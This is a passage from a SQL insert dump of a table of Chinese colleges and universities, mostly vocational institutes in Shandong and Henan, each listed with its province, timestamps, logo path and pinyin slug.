17:40:36','/images/school/default.png','yantaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1317,'东营职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','dongyingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1318,'聊城职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','liaochengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1319,'滨州职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','binzhouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1320,'山东科技职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1321,'山东服装职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongfuzhuangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1322,'德州科技职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','dezhoukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1323,'山东力明科技职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonglimingkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1324,'山东圣翰财贸职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongshenghancaimaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1325,'山东水利职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongshuilizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1326,'山东畜牧兽医职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongchumushouyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1327,'青岛飞洋职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaofeiyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1328,'山东大王职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongdawangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1329,'山东交通职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongjiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1330,'淄博职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zibozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1331,'山东外贸职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongwaimaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1332,'青岛酒店管理职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaojiudianguanlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1333,'山东信息职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongxinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1334,'青岛港湾职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaogangwanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1335,'青岛恒星职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaohengxingzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1336,'山东胜利职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongshenglizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1337,'山东经贸职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongjingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1338,'山东工业职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonggongyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1339,'山东化工职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonghuagongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1340,'青岛求实职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','qingdaoqiushizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1341,'山东现代学院','山东省','2014-04-23 00:00:00','2017-09-04 17:26:41','/images/school/default.png','shandongxiandaizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1342,'济南职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jinanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1343,'山东凯文科技职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongkaiwenkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1344,'山东外国语职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongwaiguoyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1345,'潍坊工商职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','weifanggongshangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1346,'枣庄科技职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zaozhuangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1347,'济南工程职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','jinangongchengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1348,'山东电子职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongdianzizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1349,'山东华宇工学院','山东省','2014-04-23 00:00:00','2017-09-04 17:28:57','/images/school/default.png','shandonghuayuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1350,'山东旅游职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonglvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1351,'山东铝业职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandonglvyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1352,'山东杏林科技职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongxinglinkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1353,'泰山职业技术学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','taishanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1354,'山东外事翻译职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongwaishifanyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1355,'山东药品食品职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongyaopinshipinzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1356,'山东商务职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongshangwuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1357,'山东丝绸纺织职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongsichoufangzhizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1358,'山东城市建设职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongchengshijianshezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1359,'烟台汽车工程职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','yantaiqichegongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1360,'山东司法警官职业学院','山东省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','shandongsifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1361,'华北水利水电大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','huabeishuilishuidiandaxue',0,NULL,NULL,0,NULL,NULL),(1362,'郑州大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','zhengzhoudaxue',0,NULL,NULL,0,NULL,NULL),(1363,'河南理工大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','henanligongdaxue',0,NULL,NULL,0,NULL,NULL),(1364,'河南工业大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','henangongyedaxue',0,NULL,NULL,0,NULL,NULL),(1365,'河南科技大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/1365.png','henankejidaxue',0,NULL,NULL,0,NULL,NULL),(1366,'河南农业大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:36','/images/school/default.png','henannongyedaxue',0,NULL,NULL,0,NULL,NULL),(1367,'河南大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1367.png','henandaxue',0,NULL,NULL,0,NULL,NULL),(1368,'河南师范大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanshifandaxue',0,NULL,NULL,0,NULL,NULL),(1369,'河南财经政法大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1369.png','henancaijingzhengfadaxue',0,NULL,NULL,0,NULL,NULL),(1370,'铁道警察学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','tiedaojingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1371,'郑州轻工业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouqinggongyexueyuan',0,NULL,NULL,0,NULL,NULL),(1372,'中原工学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhongyuangongxueyuan',0,NULL,NULL,0,NULL,NULL),(1373,'河南科技学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henankejixueyuan',0,NULL,NULL,0,NULL,NULL),(1374,'河南牧业经济学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanmuyejingjixueyuan',0,NULL,NULL,0,NULL,NULL),(1375,'河南中医学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanzhongyixueyuan',0,NULL,NULL,0,NULL,NULL),(1376,'新乡医学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinxiangyixueyuan',0,NULL,NULL,0,NULL,NULL),(1377,'信阳师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1378,'周口师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhoukoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1379,'安阳师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','anyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1380,'许昌学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xuchangxueyuan',0,NULL,NULL,0,NULL,NULL),(1381,'南阳师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1382,'洛阳师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','luoyangshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1383,'商丘师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shangqiushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1384,'郑州航空工业管理学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1384.png','zhengzhouhangkonggongyeguanlixueyuan',0,NULL,NULL,0,NULL,NULL),(1385,'新乡学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinxiangxueyuan',0,NULL,NULL,0,NULL,NULL),(1386,'黄淮学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huanghuaixueyuan',0,NULL,NULL,0,NULL,NULL),(1387,'平顶山学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','pingdingshanxueyuan',0,NULL,NULL,0,NULL,NULL),(1388,'信阳农林学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinyangnonglinxueyuan',0,NULL,NULL,0,NULL,NULL),(1389,'安阳工学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','anyanggongxueyuan',0,NULL,NULL,0,NULL,NULL),(1390,'洛阳理工学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','luoyangligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1391,'河南工程学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henangongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(1392,'南阳理工学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanyangligongxueyuan',0,NULL,NULL,0,NULL,NULL),(1393,'河南城建学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanchengjianxueyuan',0,NULL,NULL,0,NULL,NULL),(1394,'河南警察学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(1395,'黄河科技学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huanghekejixueyuan',0,NULL,NULL,0,NULL,NULL),(1396,'郑州科技学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoukejixueyuan',0,NULL,NULL,0,NULL,NULL),(1397,'郑州华信学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouhuaxinxueyuan',0,NULL,NULL,0,NULL,NULL),(1398,'郑州师范学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoushifanxueyuan',0,NULL,NULL,0,NULL,NULL),(1399,'商丘工学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shangqiugongxueyuan',0,NULL,NULL,0,NULL,NULL),(1400,'商丘学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shangqiuxueyuan',0,NULL,NULL,0,NULL,NULL),(1401,'郑州成功财经学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouchenggongcaijingxueyuan',0,NULL,NULL,0,NULL,NULL),(1402,'郑州升达经贸管理学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoushengdajingmaoguanlixueyuan',0,NULL,NULL,0,NULL,NULL),(1403,'河南机电高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjidiangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1404,'河南财政金融学院','河南省','2014-04-23 00:00:00','2017-09-04 17:29:37','/images/school/default.png','henancaizhengshuiwugaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1405,'郑州电力高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoudianligaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1406,'郑州幼儿师范高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1407,'安阳幼儿师范高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','anyangyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1408,'河南医学高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1409,'郑州澍青医学高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoushuqingyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1410,'焦作师范高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jiaozuoshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1411,'漯河医学高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','taheyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1412,'南阳医学高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanyangyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1413,'商丘医学高等专科学校','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shangqiuyixuegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(1414,'河南职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1415,'漯河职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','tahezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1416,'三门峡职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','sanmenxiazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1417,'郑州铁路职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoutieluzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1418,'中州大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhongzhoudaxue',0,NULL,NULL,0,NULL,NULL),(1419,'开封大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','kaifengdaxue',0,NULL,NULL,0,NULL,NULL),(1420,'焦作大学','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jiaozuodaxue',0,NULL,NULL,0,NULL,NULL),(1421,'黄河水利职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','huangheshuilizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1422,'河南工业和信息化职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henangongyehexinxihuazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1423,'河南水利与环境职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanshuiliyuhuanjingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1424,'河南信息统计职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanxinxitongjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1425,'河南林业职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanlinyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1426,'郑州电力职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoudianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1427,'周口科技职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhoukoukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1428,'河南建筑职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1429,'漯河食品职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','taheshipinzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1430,'郑州城市职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1431,'安阳职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','anyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1432,'新乡职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinxiangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1433,'驻马店职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhumadianzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1434,'焦作工贸职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jiaozuogongmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1435,'许昌陶瓷职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xuchangtaocizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1436,'郑州理工职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1437,'郑州信息工程职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouxinxigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1438,'长垣烹饪职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','changyuanpengrenzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1439,'开封文化艺术职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','kaifengwenhuayishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1440,'河南化工职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanhuagongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1441,'河南艺术职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1442,'河南机电职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjidianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1443,'河南护理职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanhulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1444,'许昌电气职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xuchangdianqizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1445,'信阳涉外职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinyangshewaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1446,'鹤壁汽车工程职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hebiqichegongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1447,'南阳职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanyangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1448,'郑州商贸旅游职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoushangmaolvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1449,'河南推拿职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henantuinazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1450,'洛阳职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','luoyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1451,'郑州黄河护理职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouhuanghehulizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1452,'郑州财税金融职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoucaishuijinrongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1453,'南阳农业职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','nanyangnongyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1454,'洛阳科技职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','luoyangkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1455,'濮阳职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','puyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1456,'许昌职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xuchangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1457,'商丘职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','shangqiuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1458,'平顶山工业职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','pingdingshangongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1459,'周口职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhoukouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1460,'济源职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','jiyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1461,'河南司法警官职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henansifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1462,'鹤壁职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','hebizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1463,'河南工业职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henangongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1464,'郑州经贸职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoujingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1465,'郑州交通职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoujiaotongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1466,'河南检察职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjianchazhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1467,'河南质量工程职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanzhilianggongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1468,'郑州信息科技职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouxinxikejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1469,'郑州电子信息职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoudianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1470,'信阳职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','xinyangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1471,'嵩山少林武术职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','songshanshaolinwushuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1472,'郑州工业安全职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhougongyeanquanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1473,'永城职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','yongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1474,'河南经贸职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjingmaozhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1475,'河南交通职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henanjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1476,'河南农业职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henannongyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1477,'郑州旅游职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhoulvyouzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1478,'郑州职业技术学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','zhengzhouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(1479,'河南工业贸易职业学院','河南省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/default.png','henangongyemaoyizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(1480,'武汉大学','湖北省','2014-04-23 00:00:00','2015-10-16 17:40:37','/images/school/1480.png','wuhandaxue',0,NULL,NULL,0,NULL,NULL),(1481,'华中科技大学','湖北省','2014-04-23 00:00:00','2015-10-16 